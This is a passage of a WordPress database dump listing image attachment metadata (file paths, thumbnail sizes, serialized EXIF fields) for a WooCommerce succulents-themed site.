"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(859,1549,'_wp_attached_file','2018/01/h7-img-6.jpg'),(860,1549,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:480;s:4:\"file\";s:20:\"2018/01/h7-img-6.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-6-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-6-550x480.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h7-img-6-550x480.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h7-img-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(861,3234,'_wp_attachment_image_alt',''),(862,3235,'_wp_attachment_image_alt','o'),(863,3236,'_wp_attachment_image_alt',''),(864,3238,'_wp_attachment_image_alt','o'),(865,3261,'_wp_attachment_image_alt','o'),(866,3262,'_wp_attached_file','2018/02/h3-slide2-graphic5-1.png'),(867,3262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:235;s:6:\"height\";i:110;s:4:\"file\";s:32:\"2018/02/h3-slide2-graphic5-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic5-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic5-1-150x110.png\";s:5:\"width\";i:150;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic5-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(868,3510,'_wp_attachment_image_alt','o'),(869,2173,'_wp_attachment_image_alt','a'),(870,2175,'_wp_attachment_image_alt','a'),(871,3262,'_wp_attachment_image_alt','o'),(872,1178,'_wp_attachment_image_alt','a'),(873,1179,'_wp_attachment_image_alt','a'),(874,3511,'_wp_attached_file','2018/02/landing-brown-2.jpg'),(875,3511,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:678;s:6:\"height\";i:433;s:4:\"file\";s:27:\"2018/02/landing-brown-2.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-brown-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-600x383.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-300x192.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-550x433.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-550x433.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"landing-brown-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-600x383.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-brown-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(876,2176,'_wp_attached_file','2018/01/product-7.jpg'),(877,2176,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-7.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-7-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-7-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-7-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-7-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-7-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-7-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(878,3263,'_wp_attached_file','2018/02/h3-slide2-graphic4.png'),(879,3263,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:284;s:6:\"height\";i:63;s:4:\"file\";s:30:\"2018/02/h3-slide2-graphic4.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"h3-slide2-graphic4-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"h3-slide2-graphic4-150x63.png\";s:5:\"width\";i:150;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"h3-slide2-graphic4-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(880,1182,'_wp_attached_file','2018/01/product6-gallery1.jpg'),(881,1182,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product6-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product6-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product6-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product6-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(882,3263,'_wp_attachment_image_alt',''),(883,4241,'_wp_attachment_image_alt','a'),(884,4242,'_wp_attachment_image_alt','a'),(885,2175,'_wp_attachment_image_alt','a'),(886,2176,'_wp_attachment_image_alt','a'),(887,3264,'_wp_attached_file','2018/02/h3-slide2-graphic6-1.png'),(888,3264,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:257;s:6:\"height\";i:28;s:4:\"file\";s:32:\"2018/02/h3-slide2-graphic6-1.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic6-1-100x28.png\";s:5:\"width\";i:100;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic6-1-150x28.png\";s:5:\"width\";i:150;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic6-1-100x28.png\";s:5:\"width\";i:100;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(889,4243,'_wp_attached_file','2018/03/landing-home8-img-1.jpg'),(890,4243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home8-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home8-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home8-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home8-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(891,3264,'_wp_attachment_image_alt',''),(892,1549,'_wp_attachment_image_alt','a'),(893,2177,'_wp_attached_file','2018/01/product-8.jpg'),(894,2177,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-8.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-8-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-8-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-8-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-8-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(895,3265,'_wp_attached_file','2018/02/h3-slide2-graphic3-1.png'),(896,3265,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:507;s:6:\"height\";i:63;s:4:\"file\";s:32:\"2018/02/h3-slide2-graphic3-1.png\";s:5:\"sizes\";a:7:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-300x37.png\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-150x63.png\";s:5:\"width\";i:150;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-300x63.png\";s:5:\"width\";i:300;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide2-graphic3-1-100x63.png\";s:5:\"width\";i:100;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(897,1550,'_wp_attached_file','2018/01/h7-img-7.jpg'),(898,1550,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:399;s:4:\"file\";s:20:\"2018/01/h7-img-7.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h7-img-7-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h7-img-7-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h7-img-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h7-img-7-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h7-img-7-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h7-img-7-550x399.j